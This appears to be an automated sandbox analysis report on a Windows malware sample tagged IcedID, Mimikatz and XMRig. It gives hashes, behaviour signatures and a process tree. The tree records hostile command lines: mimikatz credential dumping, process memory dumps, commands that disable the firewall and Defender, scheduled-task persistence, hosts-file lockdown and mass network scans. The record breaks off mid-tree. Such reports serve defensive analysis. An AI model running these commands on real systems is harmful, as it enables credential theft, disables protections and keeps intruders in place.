Analysis

  • max time kernel
    150s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-08-2024 14:42

General

  • Target

    2024-08-23_81dfde335951e18c744fb7a6451b0d86_hacktools_icedid_mimikatz.exe

  • Size

    8.9MB

  • MD5

    81dfde335951e18c744fb7a6451b0d86

  • SHA1

    27db7c6704339691e7e22a6f72431b5bb6291683

  • SHA256

    31f0bf63307610944c9d0dad5981c4ac5313f2aec949dd25c54b1d5bb7dd0352

  • SHA512

    52686dc08971e3727b5acce00b67d1cd47c1ea2098fe71a6d91426200e1b8f5143dc0ff492f6f3d6e7374a1e76fd17c538830bcaaebdb41c1d18724e44b53279

  • SSDEEP

    196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1

Malware Config

Signatures

  • Disables service(s) 3 TTPs
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Contacts a large (29383) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • OS Credential Dumping: LSASS Memory 1 TTPs

    Malicious access to Credentials History.

  • XMRig Miner payload 12 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 5 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Executes dropped EXE 29 IoCs
  • Loads dropped DLL 12 IoCs
  • UPX packed file 37 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

  • Creates a Windows Service
  • Drops file in System32 directory 18 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • NSIS installer 3 IoCs
  • Modifies data under HKEY_USERS 45 IoCs
  • Modifies registry class 14 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 15 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:2076
      • C:\Windows\TEMP\ekleagute\pcgcfj.exe
        "C:\Windows\TEMP\ekleagute\pcgcfj.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:2084
    • C:\Users\Admin\AppData\Local\Temp\2024-08-23_81dfde335951e18c744fb7a6451b0d86_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2024-08-23_81dfde335951e18c744fb7a6451b0d86_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:5076
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\bipepyze\sabzgqz.exe
        2⤵
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:4364
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:2424
        • C:\Windows\bipepyze\sabzgqz.exe
          C:\Windows\bipepyze\sabzgqz.exe
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:1080
    • C:\Windows\bipepyze\sabzgqz.exe
      C:\Windows\bipepyze\sabzgqz.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Event Triggered Execution: Image File Execution Options Injection
      • Executes dropped EXE
      • Drops file in System32 directory
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3552
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3480
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
            PID:4848
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D users
            3⤵
            • System Location Discovery: System Language Discovery
            PID:1976
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            3⤵
            • System Location Discovery: System Language Discovery
            PID:3160
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
            3⤵
            • System Location Discovery: System Language Discovery
            PID:4036
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            3⤵
            • System Location Discovery: System Language Discovery
            PID:836
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
            3⤵
              PID:2340
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static del all
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:3244
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add policy name=Bastards description=FuckingBastards
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:2588
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add filteraction name=BastardsList action=block
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:2420
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c C:\Windows\tsmmkppcn\mbklagvue\wpcap.exe /S
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:4764
            • C:\Windows\tsmmkppcn\mbklagvue\wpcap.exe
              C:\Windows\tsmmkppcn\mbklagvue\wpcap.exe /S
              3⤵
              • Drops file in Drivers directory
              • Executes dropped EXE
              • Loads dropped DLL
              • Drops file in System32 directory
              • Drops file in Program Files directory
              • Suspicious use of WriteProcessMemory
              PID:4500
              • C:\Windows\SysWOW64\net.exe
                net stop "Boundary Meter"
                4⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4296
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop "Boundary Meter"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:1364
              • C:\Windows\SysWOW64\net.exe
                net stop "TrueSight Meter"
                4⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4816
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop "TrueSight Meter"
                  5⤵
                    PID:688
                • C:\Windows\SysWOW64\net.exe
                  net stop npf
                  4⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:4204
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 stop npf
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:1148
                • C:\Windows\SysWOW64\net.exe
                  net start npf
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:2248
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 start npf
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:4492
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c net start npf
              2⤵
                PID:4412
                • C:\Windows\SysWOW64\net.exe
                  net start npf
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:412
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 start npf
                    4⤵
                      PID:1524
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c net start npf
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:2624
                  • C:\Windows\SysWOW64\net.exe
                    net start npf
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:4360
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 start npf
                      4⤵
                      • System Location Discovery: System Language Discovery
                      PID:4252
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c C:\Windows\tsmmkppcn\mbklagvue\cibtlluza.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\tsmmkppcn\mbklagvue\Scant.txt
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:4568
                  • C:\Windows\tsmmkppcn\mbklagvue\cibtlluza.exe
                    C:\Windows\tsmmkppcn\mbklagvue\cibtlluza.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\tsmmkppcn\mbklagvue\Scant.txt
                    3⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    PID:404
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c C:\Windows\tsmmkppcn\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\tsmmkppcn\Corporate\log.txt
                  2⤵
                  • Drops file in Windows directory
                  • System Location Discovery: System Language Discovery
                  PID:920
                  • C:\Windows\tsmmkppcn\Corporate\vfshost.exe
                    C:\Windows\tsmmkppcn\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                    3⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2804
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "tnfgntztu" /ru system /tr "cmd /c C:\Windows\ime\sabzgqz.exe"
                  2⤵
                    PID:4580
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:4408
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /sc minute /mo 1 /tn "tnfgntztu" /ru system /tr "cmd /c C:\Windows\ime\sabzgqz.exe"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      • Scheduled Task/Job: Scheduled Task
                      PID:3528
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "tibzeneva" /ru system /tr "cmd /c echo Y|cacls C:\Windows\bipepyze\sabzgqz.exe /p everyone:F"
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:1552
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:1932
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /sc minute /mo 1 /tn "tibzeneva" /ru system /tr "cmd /c echo Y|cacls C:\Windows\bipepyze\sabzgqz.exe /p everyone:F"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      • Scheduled Task/Job: Scheduled Task
                      PID:3344
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "euztfpama" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ekleagute\pcgcfj.exe /p everyone:F"
                    2⤵
                      PID:2096
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                        3⤵
                          PID:3256
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks /create /sc minute /mo 1 /tn "euztfpama" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ekleagute\pcgcfj.exe /p everyone:F"
                          3⤵
                          • System Location Discovery: System Language Discovery
                          • Scheduled Task/Job: Scheduled Task
                          PID:4316
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                        2⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        PID:3756
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                        2⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        PID:4976
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                        2⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        PID:2480
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static set policy name=Bastards assign=y
                        2⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        PID:4932
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                        2⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        PID:5032
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                        2⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        PID:4364
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                        2⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        PID:3176
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static set policy name=Bastards assign=y
                        2⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        PID:4412
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                        2⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        PID:4356
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                        2⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        PID:4396
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                        2⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        PID:1732
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static set policy name=Bastards assign=y
                        2⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Location Discovery: System Language Discovery
                        PID:4908
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c net stop SharedAccess
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:2484
                        • C:\Windows\SysWOW64\net.exe
                          net stop SharedAccess
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:2420
                          • C:\Windows\SysWOW64\net1.exe
                            C:\Windows\system32\net1 stop SharedAccess
                            4⤵
                              PID:3444
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c netsh firewall set opmode mode=disable
                          2⤵
                          • System Location Discovery: System Language Discovery
                          PID:2904
                          • C:\Windows\SysWOW64\netsh.exe
                            netsh firewall set opmode mode=disable
                            3⤵
                            • Modifies Windows Firewall
                            • Event Triggered Execution: Netsh Helper DLL
                            • System Location Discovery: System Language Discovery
                            PID:2652
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c netsh Advfirewall set allprofiles state off
                          2⤵
                            PID:1720
                            • C:\Windows\SysWOW64\netsh.exe
                              netsh Advfirewall set allprofiles state off
                              3⤵
                              • Modifies Windows Firewall
                              • Event Triggered Execution: Netsh Helper DLL
                              • System Location Discovery: System Language Discovery
                              PID:1824
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c net stop MpsSvc
                            2⤵
                            • System Location Discovery: System Language Discovery
                            PID:5076
                            • C:\Windows\SysWOW64\net.exe
                              net stop MpsSvc
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:2596
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop MpsSvc
                                4⤵
                                • System Location Discovery: System Language Discovery
                                PID:4668
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c net stop WinDefend
                            2⤵
                            • System Location Discovery: System Language Discovery
                            PID:5020
                            • C:\Windows\SysWOW64\net.exe
                              net stop WinDefend
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:808
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop WinDefend
                                4⤵
                                  PID:2100
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c net stop wuauserv
                              2⤵
                                PID:1584
                                • C:\Windows\SysWOW64\net.exe
                                  net stop wuauserv
                                  3⤵
                                    PID:716
                                    • C:\Windows\SysWOW64\net1.exe
                                      C:\Windows\system32\net1 stop wuauserv
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2860
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /c sc config MpsSvc start= disabled
                                  2⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:2120
                                  • C:\Windows\SysWOW64\sc.exe
                                    sc config MpsSvc start= disabled
                                    3⤵
                                    • Launches sc.exe
                                    PID:2344
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /c sc config SharedAccess start= disabled
                                  2⤵
                                    PID:3756
                                    • C:\Windows\SysWOW64\sc.exe
                                      sc config SharedAccess start= disabled
                                      3⤵
                                      • Launches sc.exe
                                      • System Location Discovery: System Language Discovery
                                      PID:4204
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c sc config WinDefend start= disabled
                                    2⤵
                                      PID:3312
                                      • C:\Windows\SysWOW64\sc.exe
                                        sc config WinDefend start= disabled
                                        3⤵
                                        • Launches sc.exe
                                        • System Location Discovery: System Language Discovery
                                        PID:4208
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /c sc config wuauserv start= disabled
                                      2⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:4512
                                      • C:\Windows\SysWOW64\sc.exe
                                        sc config wuauserv start= disabled
                                        3⤵
                                        • Launches sc.exe
                                        • System Location Discovery: System Language Discovery
                                        PID:3920
                                    • C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe
                                      C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 780 C:\Windows\TEMP\tsmmkppcn\780.dmp
                                      2⤵
                                      • Executes dropped EXE
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4580
                                    • C:\Windows\TEMP\xohudmc.exe
                                      C:\Windows\TEMP\xohudmc.exe
                                      2⤵
                                      • Executes dropped EXE
                                      • Drops file in System32 directory
                                      • Suspicious use of SetWindowsHookEx
                                      PID:3512
                                    • C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe
                                      C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 64 C:\Windows\TEMP\tsmmkppcn\64.dmp
                                      2⤵
                                      • Executes dropped EXE
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4672
                                    • C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe
                                      C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 2076 C:\Windows\TEMP\tsmmkppcn\2076.dmp
                                      2⤵
                                      • Executes dropped EXE
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3528
                                    • C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe
                                      C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 2440 C:\Windows\TEMP\tsmmkppcn\2440.dmp
                                      2⤵
                                      • Executes dropped EXE
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4316
                                    • C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe
                                      C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 2828 C:\Windows\TEMP\tsmmkppcn\2828.dmp
                                      2⤵
                                      • Executes dropped EXE
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:920
                                    • C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe
                                      C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 2976 C:\Windows\TEMP\tsmmkppcn\2976.dmp
                                      2⤵
                                      • Executes dropped EXE
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2344
                                    • C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe
                                      C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 2132 C:\Windows\TEMP\tsmmkppcn\2132.dmp
                                      2⤵
                                      • Executes dropped EXE
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3632
                                    • C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe
                                      C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 3760 C:\Windows\TEMP\tsmmkppcn\3760.dmp
                                      2⤵
                                      • Executes dropped EXE
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3712
                                    • C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe
                                      C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 3908 C:\Windows\TEMP\tsmmkppcn\3908.dmp
                                      2⤵
                                      • Executes dropped EXE
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4376
                                    • C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe
                                      C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 3968 C:\Windows\TEMP\tsmmkppcn\3968.dmp
                                      2⤵
                                      • Executes dropped EXE
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4868
                                    • C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe
                                      C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 4068 C:\Windows\TEMP\tsmmkppcn\4068.dmp
                                      2⤵
                                      • Executes dropped EXE
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1260
                                    • C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe
                                      C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 4016 C:\Windows\TEMP\tsmmkppcn\4016.dmp
                                      2⤵
                                      • Executes dropped EXE
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:404
                                    • C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe
                                      C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 5000 C:\Windows\TEMP\tsmmkppcn\5000.dmp
                                      2⤵
                                      • Executes dropped EXE
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1208
                                    • C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe
                                      C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 4768 C:\Windows\TEMP\tsmmkppcn\4768.dmp
                                      2⤵
                                      • Executes dropped EXE
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4780
                                    • C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe
                                      C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 4076 C:\Windows\TEMP\tsmmkppcn\4076.dmp
                                      2⤵
                                      • Executes dropped EXE
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1552
                                    • C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe
                                      C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 4380 C:\Windows\TEMP\tsmmkppcn\4380.dmp
                                      2⤵
                                      • Executes dropped EXE
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1080
                                    • C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe
                                      C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 512 C:\Windows\TEMP\tsmmkppcn\512.dmp
                                      2⤵
                                      • Executes dropped EXE
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4900
                                    • C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe
                                      C:\Windows\TEMP\tsmmkppcn\tbhauuzkz.exe -accepteula -mp 5104 C:\Windows\TEMP\tsmmkppcn\5104.dmp
                                      2⤵
                                      • Executes dropped EXE
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4376
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /c C:\Windows\tsmmkppcn\mbklagvue\scan.bat
                                      2⤵
                                        PID:1788
                                        • C:\Windows\tsmmkppcn\mbklagvue\pejfeyype.exe
                                          pejfeyype.exe TCP 194.110.0.1 194.110.255.255 445 512 /save
                                          3⤵
                                          • Executes dropped EXE
                                          • Drops file in Windows directory
                                          • System Location Discovery: System Language Discovery
                                          PID:4312
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                        2⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:616
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:5520
                                        • C:\Windows\SysWOW64\cacls.exe
                                          cacls C:\Windows\system32\drivers\etc\hosts /T /D users
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:2692
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                          3⤵
                                            PID:4476
                                          • C:\Windows\SysWOW64\cacls.exe
                                            cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                                            3⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:5368
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                            3⤵
                                              PID:688
                                            • C:\Windows\SysWOW64\cacls.exe
                                              cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                              3⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:1792
                                        • C:\Windows\SysWOW64\mesueu.exe
                                          C:\Windows\SysWOW64\mesueu.exe
                                          1⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetWindowsHookEx
                                          PID:3956
                                        • C:\Windows\system32\cmd.EXE
                                          C:\Windows\system32\cmd.EXE /c C:\Windows\ime\sabzgqz.exe
                                          1⤵
                                            PID:2984
                                            • C:\Windows\ime\sabzgqz.exe
                                              C:\Windows\ime\sabzgqz.exe
                                              2⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetWindowsHookEx
                                              PID:900
                                          • C:\Windows\system32\cmd.EXE
                                            C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\bipepyze\sabzgqz.exe /p everyone:F
                                            1⤵
                                              PID:1348
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                2⤵
                                                  PID:4916
                                                • C:\Windows\system32\cacls.exe
